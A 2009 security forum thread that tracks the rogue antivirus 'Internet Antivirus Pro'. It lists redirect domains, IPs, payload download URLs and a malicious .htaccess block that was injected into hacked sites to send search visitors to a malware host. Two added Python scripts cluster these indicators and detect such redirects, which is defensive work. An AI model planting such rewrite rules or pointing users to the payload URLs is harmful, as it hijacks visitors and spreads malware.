Author Topic: Internet Antivirus Pro Sites  (Read 7735 times)


August 21, 2009, 08:15:14 pm

eoin.miller

Payment/fraud site:
http://digitalbillnow.com/?pid=IAPRO3

Internet Antivirus Pro check-in post:
inb4sq.com/reports/install-report.php

Called the hosting provider up for the check-in IP because it hosted a TON of domains. He immediately suspended it (which was nice). None of these should work anymore and should hopefully stay gone - 204.27.57.227:

http://www.malwaredomainlist.com/mdl.php?search=204.27.57.227&colsearch=All&quantity=50
http://www.malwareurl.com/search.php?domain=&s=204.27.57.227&match=0&rp=500



September 05, 2009, 03:05:39 pm
Reply #1

Malware-Web-Threats

Seems to have moved to this IP: 91.212.107.103

http://www.malwareurl.com/search.php?domain=&s=InternetAntivirusPro&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

some redirects - change 3-4 times a day

goeachscan.com
gokeepscan.com
gocodescan.com
goaddscan.com
goparkscan.com
goscansnap.com
golikescan.com
gotechscan.com
goscantech.com
gotubespot.com

payload:
ina4ik.com/download/file.exe
ina4ik.com/download/InternetAntivirusPro.exe

InternetAntivirusPro family (domain   IP   date):

spelem.info   91.212.107.103   2009-09-05 
goeachscan.com   91.212.107.103   2009-09-05 
apalet.info   91.212.107.103   2009-09-05 
erpeer.info   91.212.107.103   2009-09-05 
froday.info   91.212.107.103   2009-09-05 
grumio.info   91.212.107.103   2009-09-05 
polear.info   91.212.107.103   2009-09-05 
sallat.info   91.212.107.103   2009-09-05 
searce.info   91.212.107.103   2009-09-05 
slatch.info   91.212.107.103   2009-09-05 
tenshy.info   91.212.107.103   2009-09-05 
towton.info   91.212.107.103   2009-09-05 
unroot.info   91.212.107.103   2009-09-05 
vagrom.info   91.212.107.103   2009-09-05 
voided.info   91.212.107.103   2009-09-05 
upwize.info   94.102.63.212   2009-09-04 
dictor.info   94.102.63.212   2009-09-04 
diffus.info   94.102.63.212   2009-09-04 
cality.info   94.102.63.212   2009-09-04 
ina4ct.com   94.102.63.212   2009-09-04 
ina4ik.com   94.102.63.212   2009-09-04 
alectr.info   94.102.63.212   2009-09-04 
bedash.info   91.212.107.103   2009-09-03 
scourg.info   94.102.63.212   2009-09-03 
lapsek.info   94.102.63.212   2009-09-03 
numben.info   91.212.107.103   2009-09-02 
onclew.info   91.212.107.103   2009-09-02 
sallut.info   91.212.107.103   2009-09-02 
tented.info   91.212.107.103   2009-09-02 
faites.info   91.212.107.103   2009-09-02 
droope.info   91.212.107.103   2009-09-02 
haere.info   91.212.107.103   2009-09-02 
anprun.info   91.212.107.103   2009-09-01 
ungain.info   94.102.63.212   2009-09-01 
fosset.info   91.212.107.103   2009-09-01 
knivel.info   91.212.107.103   2009-08-31 
orodes.info   91.212.107.103   2009-08-31 
gokeepscan.com   91.212.107.103   2009-08-31 
gocodescan.com   91.212.107.103   2009-08-31 
goaddscan.com   91.212.107.103   2009-08-31 
fulier.info   91.212.107.103   2009-08-31
adjudg.info   91.212.107.103   2009-08-31 
atwain.info   91.212.107.103   2009-08-31 
caretz.info   91.212.107.103   2009-08-31 
gaudad.info   91.212.107.103   2009-08-31 
krapen.info   91.212.107.103   2009-08-31 
nevils.info   91.212.107.103   2009-08-31 
outliv.info   91.212.107.103   2009-08-31 
penvie.info   91.212.107.103   2009-08-31 
stampo.info   91.212.107.103   2009-08-31 
ticedu.info   91.212.107.103   2009-08-31 
unwept.info   91.212.107.103   2009-08-31 
gelded.info   91.212.107.103   2009-08-31 
dolchi.info   91.212.107.103   2009-08-31 
figgle.info   91.212.107.103   2009-08-31 
botled.info   91.212.107.103   2009-08-31 
sighal.info   91.212.107.103   2009-08-30 
argier.info   91.212.107.103   2009-08-30 
hownet.info   91.212.107.103   2009-08-30 
leavet.info   94.102.63.212   2009-08-30 
scarre.info   91.212.107.103   2009-08-30 
steepy.info   91.212.107.103   2009-08-30 
inquir.info   91.212.107.103   2009-08-29 
pittie.info   91.212.107.103   2009-08-29
ireful.info   208.80.152.2   2009-08-29
copien.info   94.102.63.212   2009-08-29 
plamet.info   91.212.107.103   2009-08-28 
usicam.info   91.212.107.103   2009-08-28 
swoons.info   91.212.107.103   2009-08-28 
fifthz.info   91.212.107.103   2009-08-28
broths.info   91.212.107.103   2009-08-28 
robera.info   67.212.71.196   2009-08-28 
kedder.info   91.212.107.103   2009-08-28 
speen.info   91.212.107.103   2009-08-28 
anmast.info   91.212.107.103   2009-08-28 
zussia.info   91.212.107.103   2009-08-28 
prarie.info   91.212.107.103   2009-08-27 
unclin.info   91.212.107.103   2009-08-27 
miloty.info   91.212.107.103   2009-08-27 
cuplift.info   91.212.107.103   2009-08-26 
wiving.info   91.212.107.103   2009-08-26 
camlet.info   91.212.107.103   2009-08-26 
debuty.info   91.212.107.103   2009-08-26 
devicel.info   91.212.107.103   2009-08-26 
extrip.info   91.212.107.103   2009-08-26 
filths.info   91.212.107.103   2009-08-26
holdit.info   91.212.107.103   2009-08-26 
potinz.info   91.212.107.103   2009-08-26 
quoifs.info   91.212.107.103   2009-08-26 
raught.info   91.212.107.103   2009-08-26 
reglet.info   91.212.107.103   2009-08-26 
undeaf.info   91.212.107.103   2009-08-26 
narowz.info   91.212.107.103   2009-08-25 
scrowl.info   91.212.107.103   2009-08-25 
amamon.info   84.16.235.187   2009-08-25 
freckl.info   91.212.107.103   2009-08-24 
sawme.info   91.212.107.103   2009-08-24 
declin.info   91.212.107.103   2009-08-23 
fatted.info   91.212.107.103   2009-08-23 
inclin.info   91.212.107.103   2009-08-21
unowed.info   91.212.107.103   2009-08-21 
cressy.info   84.16.235.187   2009-08-21 
suffic.info   204.27.57.227   2009-08-21 
hopest.info   204.27.57.227   2009-08-21 
fatuus.info   204.27.57.227   2009-08-20 
burier.info   204.27.57.227   2009-08-20 
sibble.info   204.27.57.227   2009-08-19 
nnight.info   91.212.107.103   2009-08-19 
longed.info   204.27.57.227   2009-08-19 
briers.info   204.27.57.227   2009-08-18 
jennyfy.info   84.16.235.187   2009-08-18 
meyrie.info   91.212.107.103   2009-08-18 
pleach.info   204.27.57.227   2009-08-18 
pickknob.info   204.27.57.227   2009-08-18 
goparkscan.com   204.27.57.227   2009-08-18 
goscansnap.com   204.27.57.227   2009-08-18 
golikescan.com   204.27.57.227   2009-08-18 
gotechscan.com   204.27.57.227   2009-08-18 
goscantech.com   91.212.107.103   2009-08-18 
gotubespot.com   204.27.57.227   2009-08-18 
espied.info   204.27.57.227   2009-08-18 
envied.info   204.27.57.227   2009-08-18 
stonek.info   204.27.57.227   2009-08-18 
captum.info   204.27.57.227   2009-08-18 
enlarg.info   204.27.57.227   2009-08-18 
inb4ch.com   204.27.57.227   2009-08-18 
sicyon.info   204.27.57.227   2009-08-17 
expuls.info   204.27.57.227   2009-08-16 
unlook.info   204.27.57.227   2009-08-16 
ursley.info   204.27.57.227   2009-08-15 
plantof.info   84.16.235.187   2009-08-15 
loacher.info   67.212.71.196   2009-08-15 
unvelir.info   67.212.71.196   2009-08-15 
mixsoul.info   67.212.71.196   2009-08-15 
sleave.info   67.212.71.196   2009-08-15 
addjest.info   38.105.19.27   2009-08-15 
daobrains.info   38.105.19.27   2009-08-15 
neatsore.info   38.105.19.27   2009-08-15 
oplanet.info   38.105.19.27   2009-08-15 
ventsol.info   38.105.19.27   2009-08-15 
pattle.info   204.27.57.227   2009-08-15 
pridge.info   204.27.57.227   2009-08-14 
beeves.info   91.212.107.103   2009-08-14 
inb4it.com   204.27.57.227   2009-08-14 
farced.info   204.27.57.227   2009-08-13 
fauste.info   204.27.57.227   2009-08-13 
curtle.info   204.27.57.227   2009-08-13 
cowish.info   204.27.57.227   2009-08-12 
curtal.info   204.27.57.227   2009-08-12 
extirp.info   204.27.57.227   2009-08-11 
unmast.info   204.27.57.227   2009-08-11 
budger.info   204.27.57.227   2009-08-10 
antick.info   204.27.57.227   2009-08-10 
crazel.info   204.27.57.227   2009-08-09 
kahold.info   204.27.57.227   2009-08-09 
erworn.info   204.27.57.227   2009-08-08 
niobes.info   204.27.57.227   2009-08-07 
enteri.info   204.27.57.227   2009-08-07 
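The domain / IP / date listing above is the raw material for an infrastructure pivot: a handful of hosting IPs carry the whole rotating set of throwaway domains, so clustering by IP is more durable than blocking names one at a time. The following Python script is an added example, not code from the thread, MalwareURL or MDL. It parses a constructed ten-row excerpt of the listing in the same three-column layout (with one exact duplicate row left in on purpose), drops duplicates, groups domains per IP with the earliest and latest date each IP was seen, and flags names that follow the go<word>scan.com / goscan<word>.com scheme the redirect lists use. The row layout and the naming-pattern regex are assumptions drawn from the posted data; gotubespot.com is in the excerpt to show the pattern check does not catch every redirect host.

```python
import re
from datetime import date

# Constructed excerpt of the listing posted above (10 of ~160 rows), copied with the
# same irregular spacing and including one exact duplicate row.
LISTING = """\
spelem.info   91.212.107.103   2009-09-05
goeachscan.com   91.212.107.103   2009-09-05
upwize.info   94.102.63.212   2009-09-04
ina4ik.com   94.102.63.212   2009-09-04
ina4ik.com   94.102.63.212    2009-09-04
ireful.info                208.80.152.2   2009-08-29
gokeepscan.com   91.212.107.103   2009-08-31
suffic.info   204.27.57.227   2009-08-21
goscantech.com   91.212.107.103   2009-08-18
gotubespot.com   204.27.57.227   2009-08-18
"""

# One row: domain, IPv4, ISO date, separated by runs of whitespace (assumed layout).
ROW = re.compile(
    r"^\s*(?P<domain>[a-z0-9.-]+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<date>\d{4}-\d{2}-\d{2})\s*$", re.I)

# Naming scheme of the redirect domains in the thread (assumption drawn from the
# posted names): "go" + word + "scan" or "go" + "scan" + word, under .com.
REDIRECT_NAME = re.compile(r"^go(?:[a-z]+scan|scan[a-z]+)\.com$", re.I)


def parse_listing(text):
    """Return [(domain, ip, date)], skipping blank lines and exact duplicate rows."""
    rows, seen = [], set()
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ROW.match(line)
        if not m:
            raise ValueError(f"unparseable row: {line!r}")
        rec = (m["domain"].lower(), m["ip"], date.fromisoformat(m["date"]))
        if rec not in seen:
            seen.add(rec)
            rows.append(rec)
    return rows


def cluster_by_ip(rows):
    """Map each IP to its domain set and the earliest/latest date it appears with."""
    clusters = {}
    for domain, ip, seen_on in rows:
        c = clusters.setdefault(ip, {"domains": set(), "first": seen_on, "last": seen_on})
        c["domains"].add(domain)
        c["first"] = min(c["first"], seen_on)
        c["last"] = max(c["last"], seen_on)
    return clusters


def redirect_domains(rows):
    """Domains whose name matches the go*scan*.com scheme, sorted."""
    return sorted({d for d, _, _ in rows if REDIRECT_NAME.match(d)})


if __name__ == "__main__":
    rows = parse_listing(LISTING)
    by_size = sorted(cluster_by_ip(rows).items(), key=lambda kv: -len(kv[1]["domains"]))
    for ip, c in by_size:
        print(f"{ip:16} {len(c['domains']):3} domains  {c['first']} .. {c['last']}")
    print("redirect-style names:", ", ".join(redirect_domains(rows)))
```

Run against the full table the IP clusters give a block list of four or five addresses instead of 160 names, and the first/last dates per IP show when the operator moved between hosters (the post above notes the move from 204.27.57.227 to 91.212.107.103).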

October 03, 2009, 10:18:24 am
Reply #2

Malware-Web-Threats

internetantiviruspro:

redirects:
goscancode.com
downloader:
guiany.info/download/install.php
emnity.info/download/install.php
scanatom6.com/download/install.php

http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Date&search=goscan&colsearch=All&ascordesc=DESC&quantity=500&page=0
http://www.malwaredomainlist.com/mdl.php?search=scan4&colsearch=All&quantity=500&inactive=on
http://www.malwaredomainlist.com/mdl.php?search=scan6&colsearch=All&quantity=500&inactive=on

payload location:

inb4iv.com/download/vista/GeneralAntivirus.exe
inb4iv.com/download/vista/file.exe
inb4iv.com/download/xp/GeneralAntivirus.exe
inb4iv.com/download/xp/file.exe
inb4iv.com/download/install.exe
inb4iv.com/download/internetantiviruspro.exe
inb4iv.com/download/oaNEJ4wQ0S.exe
inb4iv.com/download/pinch_youtubehof.net_de.exe
inb4iv.com/download/sf9Zx1SDiB.exe
inb4iv.com/download/InternetAntivirusPro2.exe
inb4iv.com/download/file.exe
inb4iv.com/download/file2.exe
inb4iv.com/download/file3.exe
inb4iv.com/download/file4.exe
inb4iv.com/download/IAInstall.exe
inb4iv.com/download/IAInstall2.exe
inb4iv.com/download/IAInstall3.exe
inb4iv.com/download/IAInstall4.exe
inb4iv.com/download/IAUninstaller.exe
inb4iv.com/download/InternetAntivirusPro.exe.aw.exe
inb4iv.com/download/InternetAntivirusPro.exe
inb4iv.com/download/InternetAntivirusPro.exe.new.exe
inb4iv.com/download/InternetAntivirusPro.exe.old.exe
inb4iv.com/download/InternetAntivirusPro.exe.was

in5iv.com/download/IAInstall.exe
in5iv.com/download/IAInstall2.exe
in5iv.com/download/IAInstall3.exe
in5iv.com/download/IAInstall4.exe
in5iv.com/download/IAUninstaller.exe
in5iv.com/download/InternetAntivirusPro.exe
in5iv.com/download/InternetAntivirusPro.exe.aw.exe
in5iv.com/download/InternetAntivirusPro.exe.new.exe
in5iv.com/download/InternetAntivirusPro.exe.old.exe
in5iv.com/download/InternetAntivirusPro.exe.was
in5iv.com/download/InternetAntivirusPro2.exe
in5iv.com/download/file.exe
in5iv.com/download/file2.exe
in5iv.com/download/file3.exe
in5iv.com/download/file4.exe
in5iv.com/download/install.exe
in5iv.com/download/internetantiviruspro.exe
in5iv.com/download/oaNEJ4wQ0S.exe
in5iv.com/download/pinch_youtubehof.net_de.exe
in5iv.com/download/sf9Zx1SDiB.exe
in5iv.com/download/vista/GeneralAntivirus.exe
in5iv.com/download/vista/file.exe
in5iv.com/download/xp/GeneralAntivirus.exe
in5iv.com/download/xp/file.exe


October 17, 2009, 03:54:39 pm
Reply #4

Malware-Web-Threats


payload:

inb6it.com/download/vista/GeneralAntivirus.exe
inb6it.com/download/vista/file.exe
inb6it.com/download/xp/GeneralAntivirus.exe
inb6it.com/download/xp/file.exe
inb6it.com/download/install.exe
inb6it.com/download/internetantiviruspro.exe
inb6it.com/download/oaNEJ4wQ0S.exe
inb6it.com/download/pinch_youtubehof.net_de.exe
inb6it.com/download/sf9Zx1SDiB.exe
inb6it.com/download/InternetAntivirusPro2.exe
inb6it.com/download/file.exe
inb6it.com/download/file2.exe
inb6it.com/download/file3.exe
inb6it.com/download/file4.exe
inb6it.com/download/IAInstall.exe
inb6it.com/download/IAInstall2.exe
inb6it.com/download/IAInstall3.exe
inb6it.com/download/IAInstall4.exe
inb6it.com/download/IAUninstaller.exe
inb6it.com/download/InternetAntivirusPro.exe.aw.exe
inb6it.com/download/InternetAntivirusPro.exe.new.exe
inb6it.com/download/InternetAntivirusPro.exe.old.exe
inb6it.com/download/InternetAntivirusPro.exe.was

redirects:

godirscan.com
goeasescan.com
gonamescan.com
goscanadd.com
goscandir.com
goscandoer.com
goscanease.com
goscankeep.com
goscanlike.com
goscanmute.com
goscanneat.com
goscanpick.com
goscansole.com
goscantrio.com
goscanxtra.com
gosolescan.com
godoerscan.com
gopickscan.com

domains used:

girded.info
spinge.info
pante.info
obsque.info
veldun.info
pasio.info
cheir.info
lavolt.info
besort.info
freiny.info
suivez.info
guiany.info
pretia.info
exampl.info
lowatt.info
meanly.info
surnam.info
nroof.info
orifex.info
volsce.info
topful.info
engirt.info
bedaub.info
ignomy.info
implor.info
birnam.info
pplay.info
strawy.info
fliht.info
squach.info
dislik.info
xonker.info
qward.info
sigeia.info
octian.info
deferr.info
afront.info
vipren.info
almain.info
empery.info
bagse.info


October 19, 2009, 07:56:52 pm
Reply #6

eoin.miller

http://marketcoms.cn?pid=71&sid=f3b6e0
http://applestore2.cn/?pid=71&sid=f3b6e0

redirecting to your-pc-protection2.com

October 20, 2009, 03:59:21 pm
Reply #7

eoin.miller

We have been seeing quite a few google searches redirect to mg1b.info. However, if you go to the sites directly, it does not redirect you. Looks like a ton of people got owned and had their .htaccess files overwritten to something like this:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://mg1b.info/go2.php?s=x301 [R,L]

Looks like it has been going on for quite a while, though I guess there is a resurgence in this technique for pushing Internet Antivirus Pro:
http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/
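A file-level check for the .htaccess tampering described in the post above, as an added example that is not from the post or the linked blog. Because the injected rules only fire when the Referer names a search engine, fetching the site directly (or with a scanner that sends no Referer) shows nothing; reading the .htaccess itself does not have that blind spot. The script parses .htaccess text, collects RewriteCond lines on %{HTTP_REFERER} that mention a search engine, and reports any RewriteRule those conditions gate that issues an external redirect (R flag, absolute URL, host not in an allow-list you pass in). Both sample inputs are constructed: the suspect block reproduces the rules quoted in the post, the benign one is a typical canonical-host redirect; the example.org hosts and the engine list (the post's six plus bing) are assumptions.

```python
import re
from urllib.parse import urlparse

# Search-engine names to look for in referer conditions (the six from the post, plus bing).
SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo", "bing")

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
ANY_COND = re.compile(r"^\s*RewriteCond\b", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

# Constructed sample 1: the rules quoted in the post above (mg1b.info is the host named there).
SUSPECT = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://mg1b.info/go2.php?s=x301 [R,L]
"""

# Constructed sample 2: an ordinary canonical-host redirect plus a front-controller rule.
BENIGN = r"""RewriteEngine On
# send bare host to www (normal use of mod_rewrite)
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ https://www.example.org/$1 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ index.php [L]
"""


def find_referrer_redirects(htaccess_text, local_hosts=()):
    """Return [(line_no, target_url, engines)] for every RewriteRule that is gated on an
    HTTP_REFERER condition naming a search engine and redirects (R flag) to an absolute
    URL whose host is not in local_hosts."""
    findings, pending = [], []  # pending: referer patterns seen before the next rule
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = REFERER_COND.match(line)
        if m:
            pending.append(m.group(1).lower())
            continue
        if ANY_COND.match(line):
            continue  # condition on something other than the referer; not our signal
        m = RULE.match(line)
        if not m:
            continue
        target, flags = m.group(2), m.group(3) or ""
        conds, pending = pending, []  # RewriteCond lines apply only to the next RewriteRule
        flag_names = {f.strip().split("=")[0].upper() for f in flags.split(",") if f.strip()}
        engines = tuple(sorted({e for pat in conds for e in SEARCH_ENGINES if e in pat}))
        if not engines or "R" not in flag_names:
            continue
        parsed = urlparse(target)
        if parsed.scheme in ("http", "https") and parsed.hostname and parsed.hostname not in local_hosts:
            findings.append((no, target, engines))
    return findings


if __name__ == "__main__":
    for label, text in (("suspect", SUSPECT), ("benign", BENIGN)):
        hits = find_referrer_redirects(text, local_hosts=("example.org", "www.example.org"))
        print(label, "->", hits or "no referer-gated external redirect")
```

Pair this with a comparison of each .htaccess against a known-good copy (content hash and mtime): a referer-gated redirect is the signature of this particular campaign, but any unexpected rewrite to an external host deserves a look.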

October 20, 2009, 09:45:53 pm
Reply #8

eoin.miller

And yet more that I keep coming to for this same one today:

computer-protection-7.com

November 06, 2009, 09:50:38 am
Reply #9

Malware-Web-Threats


redirects:

godeckscan.com
gohandscan.com
goherdscan.com
gorestscan.com
gosakescan.com
goscandeck.com
goscanhand.com
goscanherd.com
goscanrest.com
goscansake.com
goscantown.com
gotownscan.com
gowellscan.com
golookscan.com

rogue downloader:

payload: /download/IAInstall.exe

ducyqan.cn
dovzyag.cn
duzebyn.cn
dozabes.cn
dybapi.cn
epuneyv.cn
epuvyiz.cn

online but not working:
cafgouh.cn
cecyde.cn
eboezu.cn
byzivte.cn
etyupy.cn
etywuq.cn
ebejar.cn
ebiuhas.cn
byxzeq.cn
cecxoyk.cn
ebogumi.cn
bysivak.cn
ebeama.cn
etuexyp.cn
ebureky.cn
etuacwo.cn
etyaha.cn
etuyzal.cn
etupet.cn
cakdoz.cn
cakevy.cn
cakuqe.cn
camjyel.cn
rousen.info
esuteyb.cn
eceiqak.cn
ecezofu.cn
etobez.cn
ecibuaj.cn
etoubal.cn
esyofo.cn
eticod.cn
etexyaj.cn
esyviq.cn
esyeziw.cn
ecoaly.cn
eteyxuz.cn
ereuwzo.cn
ecoydo.cn
ecyarzo.cn
eriolyh.cn
erixune.cn
dyshir.cn
dytrevu.cn
erauso.cn
ebaetu.cn
ereuqba.cn
dyzani.cn
etyawjo.cn
kireja.cn
kirgune.cn
dymsem.cn
kizxyun.cn
dyqunre.cn
eruqav.cn
kixyhce.cn
erujale.cn
dyqkuam.cn
kiwraux.cn
dyrajko.cn
dyrmilu.cn
eroisyw.cn
komsehi.cn
kopeka.cn
komxaiv.cn
eroyjgi.cn
dybaqhi.cn
dybulhe.cn
komvyl.cn
dyfpilu.cn
dyckeqi.cn
dycotda.cn
kohkiv.cn
kohsuby.cn
dyjurwe.cn
eryase.cn
eruqief.cn
dyjzeti.cn
etykauw.cn
dykazif.cn
dykqupo.cn
erywiza.cn
ewaevuf.cn
kocwiyg.cn
ewalepi.cn
ceduszi.cn
kocepal.cn
erypuin.cn
erygibo.cn
erymezo.cn
kogiteq.cn
kogivet.cn
esaowy.cn
cekrin.cn
ecyigud.cn
celwahy.cn
cepamwi.cn
ecygaf.cn
cekfaq.cn
evykoas.cn
ewaevqu.cn
ceqywis.cn
evuxyv.cn
evybine.cn
evouga.cn
edamym.cn
cafropy.cn
eviyzru.cn
cerdiko.cn
edivuka.cn
ediyfzu.cn
ecyujo.cn
edociv.cn
cepula.cn
cifebi.cn
evyazi.cn
cerwyk.cn
kipuxo.cn
dovnaji.cn
kirdabe.cn
edoqeg.cn
cigzaon.cn
kijxayt.cn
edoeqnu.cn
dotqyuw.cn
kiluxso.cn

other rogue on the same IP:

g-antivirus.com
general-av.com
generalavs.com